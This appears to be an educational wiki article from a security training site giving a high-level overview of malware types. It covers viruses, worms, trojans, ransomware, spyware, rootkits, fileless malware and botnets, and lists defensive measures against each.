Malware Types Explained: From Viruses to Ransomware
A comprehensive overview of malware categories, how each type works, and the defenses most effective against them.
Last updated Apr 7, 2026Current
Continue your mission
A comprehensive overview of malware categories, how each type works, and the defenses most effective against them.
Malware (malicious software) is any software intentionally designed to cause damage, gain unauthorized access, or disrupt operations. It is the broadest category of cyber threat and encompasses everything from simple nuisance programs to sophisticated nation-state tools.
Understanding malware types helps you recognize attack patterns, choose appropriate defenses, and communicate effectively during incident response.
A virus attaches itself to a legitimate program or file and executes when the host file is opened. Viruses require human action to spread, such as opening an infected email attachment or running a compromised installer. They can corrupt files, steal data, or create backdoors.
Modern viruses are less common than they were in the 1990s and 2000s, but the concept persists in macro viruses embedded in Office documents.
Worms are self-replicating malware that spread across networks without human interaction. They exploit vulnerabilities in network services to propagate. The Morris Worm (1988) and WannaCry (2017) are famous examples. WannaCry used the EternalBlue SMB vulnerability to spread across networks in minutes, encrypting systems as it went.
Defense: patch management, network segmentation, and disabling unnecessary network services.
Trojans disguise themselves as legitimate software. Users voluntarily install them, believing they are downloading a useful application, game crack, or document viewer. Once installed, the Trojan executes its payload, which might install a backdoor, steal credentials, or download additional malware.
Remote Access Trojans (RATs) give attackers persistent, remote control over the infected system. They can access the webcam, capture keystrokes, browse files, and use the machine as a pivot point.
Defense: user awareness, application allowlisting, and download source verification.
Ransomware encrypts a victim's files and demands payment (typically in cryptocurrency) for the decryption key. Modern ransomware operations use double extortion: they steal data before encrypting it and threaten to publish it if the ransom is not paid. Some groups add triple extortion, contacting the victim's customers or partners to apply additional pressure.
Ransomware-as-a-Service (RaaS) models allow affiliates to deploy ransomware developed by the group's operators, splitting the proceeds. This has dramatically lowered the barrier to entry for ransomware attacks.
Defense: robust backups (tested regularly, stored offline), EDR, network segmentation, privilege management, and incident response planning.
Spyware silently monitors user activity and exfiltrates data. It may capture keystrokes (keylogger), take screenshots, monitor browsing history, or intercept communications. Commercial spyware (like NSO Group's Pegasus) targets mobile devices and can access messages, calls, cameras, and microphones.
Defense: EDR, mobile device management, application permissions review.
Adware displays unwanted advertisements, often as browser pop-ups or redirects. While less dangerous than other malware types, aggressive adware can degrade system performance, track browsing habits, and sometimes serve as a delivery mechanism for more serious malware.
Rootkits embed themselves deep in the operating system (kernel level or below) to hide their presence and the presence of other malware. They modify system calls, file listings, and process tables so that security tools cannot detect the malicious software running on the system.
Firmware rootkits persist below the OS, surviving reinstallation and even hard drive replacement. They are extremely difficult to detect and remove.
Defense: Secure Boot, UEFI integrity monitoring, and in severe cases, hardware replacement.
Fileless malware operates entirely in memory without writing files to disk. It leverages legitimate system tools (PowerShell, WMI, .NET) to execute malicious actions, a technique called "living off the land." Because there is no malware file on disk, traditional antivirus tools that scan files are ineffective.
Defense: behavioral detection (EDR), PowerShell logging, script block logging, and restricting access to administrative tools.
A botnet is a network of compromised devices controlled by an attacker (the botmaster). Individual infected devices are called bots or zombies. Botnets are used for DDoS attacks, spam distribution, credential stuffing, cryptocurrency mining, and as proxy networks for anonymizing other attacks.
Defense: network monitoring for command-and-control communication, DNS filtering, and IoT security practices.
CDA Theater missions that address topics covered in this article.
Cryptographic technique that encrypts data while preserving its original format and length, enabling protection without breaking legacy system compatibility.
Guide to HTTP/2 security covering binary framing, HPACK compression attacks, rapid reset vulnerability, stream multiplexing risks, and mitigation strategies.
Explanation of Certificate Transparency framework, covering log servers, Signed Certificate Timestamps, monitoring capabilities, and detection of fraudulent certificates.
Written by CDA Wiki Team
Found an issue? Help improve this article.